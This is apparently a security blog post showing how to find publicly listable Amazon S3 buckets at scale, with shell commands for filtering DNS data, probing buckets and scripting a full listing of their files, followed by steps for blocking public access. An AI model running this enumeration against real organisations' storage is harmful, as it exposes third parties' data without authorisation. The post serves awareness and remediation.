Public Amazon S3 Buckets and the risk of data leakage

We’ve seen the recent CityBee leak from Lithuania (the report is on this site). Its main cause was a misconfiguration of Azure Blob Storage that allowed unauthenticated public access. This led to the leak of more than 110,000 users’ information.

So I was thinking: what if we could replicate this with Amazon S3 buckets? And heck yeah, it worked.

So, following the same steps shown in Behind the scenes of CityBee customer data leak, I will generate a list of domain names that point to Amazon S3 buckets.

1. Download the CNAME dataset from Rapid7 Open Data (Forward DNS, FDNS)

wget https://opendata.rapid7.com/sonar.fdns_v2/2021-01-29-1611878713-fdns_cname.json.gz
gunzip 2021-01-29-1611878713-fdns_cname.json.gz

2. Cleaning up the data

jq -r '.value' 2021-01-29-1611878713-fdns_cname.json > cname.txt
sort -u cname.txt -o cname.txt
grep '\.s3\.' cname.txt > aws.txt

At this point we should have a list of S3 bucket hostnames (the CNAME targets) in aws.txt.
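The grep '\.s3\.' filter above is quick but loose. It misses the older dash-style regional endpoints such as bucket.s3-us-west-2.amazonaws.com. It also keeps any unrelated host that happens to contain .s3. in its name.

A stricter filter could look like the minimal sketch below. It assumes the CNAME targets of interest end in amazonaws.com, so it deliberately ignores other S3-compatible providers. filter_s3_hosts is a hypothetical helper name, not part of any tool.

```shell
# filter_s3_hosts (hypothetical helper): read hostnames on stdin and keep only those
# under an AWS S3 endpoint, e.g. bucket.s3.amazonaws.com, bucket.s3.eu-west-1.amazonaws.com,
# bucket.s3-us-west-2.amazonaws.com or bucket.s3-website-us-east-1.amazonaws.com.
# The optional trailing dot tolerates fully qualified names ending in "amazonaws.com.".
filter_s3_hosts() {
  grep -Ei '\.s3([.-][a-z0-9-]+)*\.amazonaws\.com\.?$'
}

# Example: stream the FDNS dump straight into the filter without unpacking it to disk.
# gzip -dc 2021-01-29-1611878713-fdns_cname.json.gz | jq -r '.value' | filter_s3_hosts | sort -u > aws.txt
```

The commented example also folds steps 1 and 2 into one pipeline. This avoids writing the large decompressed JSON file to disk.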

3. Verifying that the data is accessible

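Unlike the Azure Blob Storage case, there’s no need to brute-force directory names or append GET parameters. On S3, a plain GET request to the root of a bucket returns a listing of its files whenever anonymous listing is allowed. So all that’s left is to check whether each domain still exists and allows access. I’ll do this with ProjectDiscovery’s httpx, keeping only the hosts that answer with HTTP 200: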

httpx -l aws.txt -mc 200 -no-color -o aws_result.txt
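httpx keeps only the hosts that return 200, meaning S3 served the bucket’s object listing anonymously. The other status codes are informative too:

- S3 typically answers 403 (AccessDenied) when the bucket exists but anonymous listing is denied.
- It answers 404 (NoSuchBucket) when the bucket no longer exists.

The sketch below checks a single bucket URL with plain curl and labels these common cases. s3_status and classify_status are hypothetical helper names. Any other code, such as a redirect to a different region or 000 for a failed connection, is simply reported as "other".

```shell
# s3_status (hypothetical helper): print only the HTTP status code returned for a URL.
s3_status() {
  curl -s -o /dev/null -w '%{http_code}' "$1"
}

# classify_status (hypothetical helper): translate common S3 status codes for a bucket root.
classify_status() {
  case "$1" in
    200) echo "listable: anonymous listing allowed" ;;
    403) echo "exists: listing denied" ;;
    404) echo "gone: no such bucket" ;;
    *)   echo "other: HTTP $1" ;;
  esac
}

# Example (requires network access; bucket-name is a placeholder):
# classify_status "$(s3_status https://bucket-name.s3.amazonaws.com/)"
```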

4. Listing the files in the S3 buckets

For this I took the lazy route and asked the POSIX wizard Stnby to write a script that would do it for me. Here’s what he came up with:

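# get_aws_keys.sh: print a URL for every object key in the bucket listing at $1
# (the "// empty" and type check handle empty buckets and buckets with a single object)
curl -s "$1" | yq-xq -r '.ListBucketResult.Contents // empty | if type == "array" then .[] else . end | .Key' \
  | while IFS= read -r key; do printf '%s/%s\n' "$1" "$key"; done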

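This script prints the URL of every file (object key) listed at the supplied S3 bucket URL. Keep in mind that S3 returns at most 1,000 keys per listing request and the script doesn’t follow pagination, so larger buckets are only partially listed. Here, yq-xq refers to xq, the XML front end of the Python yq package; if you installed yq with pip, the command is just xq. To use it with our list, we simply need to run: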

chmod +x get_aws_keys.sh
xargs -L 1 ./get_aws_keys.sh < aws_result.txt > files.txt

The resulting files.txt contains the URL of every publicly listed file across all of those S3 buckets. At the time of writing this post, my list had over 170,000 files. Just think about it: all of this data is publicly available. Now imagine the damage this could cause if someone decided it would be a great idea to put sensitive data there, or even worse, a whole database.
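To see how those files are spread across buckets, the URLs in files.txt can be grouped by host. This is a minimal sketch, assuming every line has the form scheme://host/key as produced by get_aws_keys.sh. count_files_per_bucket is a hypothetical helper name.

```shell
# count_files_per_bucket (hypothetical helper): read URLs like https://host/key on stdin
# and print "<count> <host>" for each host, largest first.
count_files_per_bucket() {
  # With "/" as the separator, field 3 of "https://host/key" is the host.
  awk -F/ '{ print $3 }' | sort | uniq -c | sort -rn
}

# Example:
# count_files_per_bucket < files.txt | head
```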

5. Remediation

Block public access to private information, or better, don’t store it on these storage services in the first place if it isn’t necessary.
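If you run S3 buckets yourself, the most direct fix is S3 Block Public Access. The sketch below enables all four settings on one bucket and then prints the stored configuration so you can confirm the change took effect. The four settings are BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy and RestrictPublicBuckets.

The sketch assumes the AWS CLI is installed and configured with credentials allowed to manage that bucket. block_public_access is a hypothetical helper name and my-bucket is a placeholder.

```shell
# block_public_access (hypothetical helper): enable all four S3 Block Public Access
# settings on a bucket you own, then print the stored configuration to confirm.
# Assumes the AWS CLI is installed and configured with permission to change the bucket.
block_public_access() {
  bucket="$1"
  aws s3api put-public-access-block \
    --bucket "$bucket" \
    --public-access-block-configuration \
    'BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true' &&
  aws s3api get-public-access-block --bucket "$bucket"
}

# Example (my-bucket is a placeholder):
# block_public_access my-bucket
```

After this, rerunning the httpx check from step 3 against your bucket should no longer report a 200. The aws s3control put-public-access-block command applies the same four settings to a whole AWS account instead of a single bucket.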

Well, that’s all I’ve got for you today, and we’ll meet again in the next post. Stay safe and wear a mask.